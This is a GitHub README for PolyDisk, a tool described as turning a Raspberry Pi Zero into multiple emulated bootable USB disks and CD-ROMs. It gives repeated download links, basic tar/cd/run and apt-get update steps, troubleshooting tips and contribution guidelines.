Skip to content

Latest commit

Β 

History

History
105 lines (76 loc) Β· 4.71 KB

File metadata and controls

105 lines (76 loc) Β· 4.71 KB
layout default
title πŸš€ PolyDisk - Create Endless Bootable Disks Easily
description πŸ–₯️ Emulate USB disks and CD-ROMs with PolyDisk, simplifying booting from USB using a collection of .iso and .img files on Raspberry Pi boards.

πŸš€ PolyDisk - Create Endless Bootable Disks Easily

πŸ“₯ Download the Latest Version

Download

πŸ“š Introduction

PolyDisk allows you to turn your Raspberry Pi Zero into an unlimited number of bootable USB disks and CD-ROMs. With this software, you can easily manage different operating systems and applications. It simplifies the process of creating multiple boot options on a single device.

πŸ’» System Requirements

Before downloading PolyDisk, ensure your setup meets the following requirements:

  • Operating System: Raspberry Pi OS or any Linux distribution compatible with Raspberry Pi Zero
  • Hardware: Raspberry Pi Zero with at least 512MB RAM
  • Storage: A USB drive (minimum 8GB recommended) or CD-ROM
  • Network: Internet connection for downloading the application

πŸš€ Getting Started

To get started with PolyDisk, follow these simple steps:

  1. Visit the Releases Page
    Click the link below to access the PolyDisk releases page where you can download the latest version of the software.
    Download PolyDisk

  2. Locate the Latest Release
    On the releases page, find the version marked as the latest. There, you will see the available files for download.

  3. Download the Application
    You will find files listed under the latest release. Click on the relevant file for your system. For Raspberry Pi, look for the Linux ARM file.

πŸ“₯ Download & Install

To download and install PolyDisk, follow these steps:

  1. Download PolyDisk
    Access the releases page again for easy access: Download PolyDisk. Once there, click on the Linux ARM file to start downloading.

  2. Extract the Downloaded File
    Once the download finishes, locate the file in your downloads folder. Usually, it will be a .tar.gz or .zip file. Use the following terminal command to extract it:

    tar -xvzf PolyDisk-VERSION.tar.gz

    Replace VERSION with the actual version you downloaded.

  3. Navigate to the Directory
    Open your terminal and navigate to the extracted folder. You can do this with these commands:

    cd PolyDisk-VERSION
  4. Run the Application
    To start the application, enter the following command in your terminal:

    ./poly_disk
  5. Follow On-Screen Instructions
    The application will guide you through the process of creating bootable disks. Follow the prompts to select the USB drive or CD-ROM you want to use.

πŸ› οΈ Features

PolyDisk includes several useful features for managing bootable media:

  • Create Multiple Bootable Options: Easily switch between different operating systems on your Raspberry Pi.
  • Streamlined Interface: User-friendly design simplifies navigation.
  • Backup Functionality: Save your configurations for future use.
  • Compatibility: Works well with various operating systems, including Raspbian, Ubuntu, and others.

πŸ”§ Troubleshooting

If you encounter issues while using PolyDisk, consider these common solutions:

  • Check Your USB Drive: Ensure the USB drive is properly connected and has sufficient space.

  • Re-download: If the file seems corrupted, delete it and download again from the releases page.

  • Update Dependencies: Run the following commands to ensure your system is up to date:

    sudo apt-get update
    sudo apt-get upgrade

βœ‰οΈ Support

If you need further assistance or have questions, feel free to open an issue on our GitHub repository. We value your feedback and aim to improve your experience with PolyDisk.

πŸ“ Contributing

If you want to contribute to PolyDisk, please follow these guidelines:

  1. Fork the repository.
  2. Create a new branch for your feature or fix.
  3. Make your changes and commit them.
  4. Submit a pull request explaining your changes.

Your contributions help enhance the software and assist users in creating bootable disks more efficiently.

πŸ” Additional Resources

Visit the releases page to get started with PolyDisk today: Download PolyDisk